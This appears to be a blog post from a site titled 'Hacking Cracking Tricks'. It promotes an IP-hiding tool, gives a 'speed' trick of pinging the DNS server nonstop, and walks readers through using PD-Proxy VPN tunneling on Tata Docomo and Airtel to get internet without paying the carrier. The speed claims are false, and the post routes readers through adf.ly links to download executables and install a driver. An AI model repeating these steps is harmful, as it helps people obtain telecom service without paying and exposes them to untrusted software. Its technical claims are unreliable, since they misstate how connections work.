    Be careful! Have you ever been aware of your IP address? Your IP exactly points to your location, with very high precision, right to the door of your apartment. Every time you visit a website, your IP address is completely exposed.

    Auto Hide IP will help you conceal your real IP and protect your identity online. You need not worry about your privacy and security any more. Browse anonymously with one click from now on.

    Download

    Way To Increase internet speed in 2G/3G And Others

    This trick works on dial-up, DSL, broadband and wireless modems as well.
    Click on the Start button,
    then select Run, which opens the Run dialog box (in Windows 7 press Windows key+R).
    * Type "cmd" and press Enter.

    This opens the command prompt (a black window).

    [If you are using Windows 7, don't use Windows PowerShell]

    * In the command prompt (black window) type "ipconfig /all".

    Scroll up to the PPP adapter section and
    find the IP address of the DNS server (the first one if there is more than one, e.g. 121.242.190.210).


    Then click on the Start button and select Run (in Windows 7 press Windows key+R)
    * and type the following command in it:
    ping <DNS SERVER IP> -t

    e.g. ping 121.242.190.210 -t


    This command opens a command prompt that keeps pinging your server; minimize it and don't close it.
    You can close the previous command prompt in which you found your DNS server IP.
    This command forces your server to stay connected with you.

    [FREE]-Get Free Internet in 2G 3G And Others[FREE]


    Here is my new tutorial on how to get free Internet for 2G, 3G and others.





    Use PD-Proxy - VPN Tunneling Software



    This is fully tested on Tata Docomo and Airtel, and I am using an N70 with Tata Docomo Internet.



    Go here and make your account first: http://adf.ly/1l0up



    Steps



    1. Install .NET Framework 3.5 - http://adf.ly/1l0KS



    2. Download and unzip the binary at http://adf.ly/1l0cM



    3. A message box will appear asking whether your system is running on a 32-bit or a 64-bit platform.



    4. Open PD-Proxy.exe. When it asks you to install a driver, press Yes.



    5. Connect your Internet using PC Suite or a manual connection.



    6. Press Connect in the PD-Proxy software and wait until it says that you are connected.



    Hey, you are successfully connected!



    Here is my screenshot after connecting:

    My IP shows I am from the Netherlands.

    Note: you are not a premium user on http://www.pdproxy.com



    You are a demo user, so you can't get unlimited access.

    Only premium users get unlimited access.



    Demo user: 100 MB per day

    Premium user: unlimited


    For more info, go to http://adf.ly/1l0vk



    Thanks and regards, Yogesh Kashyap

    - Copyright © .Hacking Cracking Tricks And Tutorials, Paid Scripts, Latest Exploits, 0Day Vulnerability, - Skyblue - Powered by Blogger - Designed by Johanes Djogan -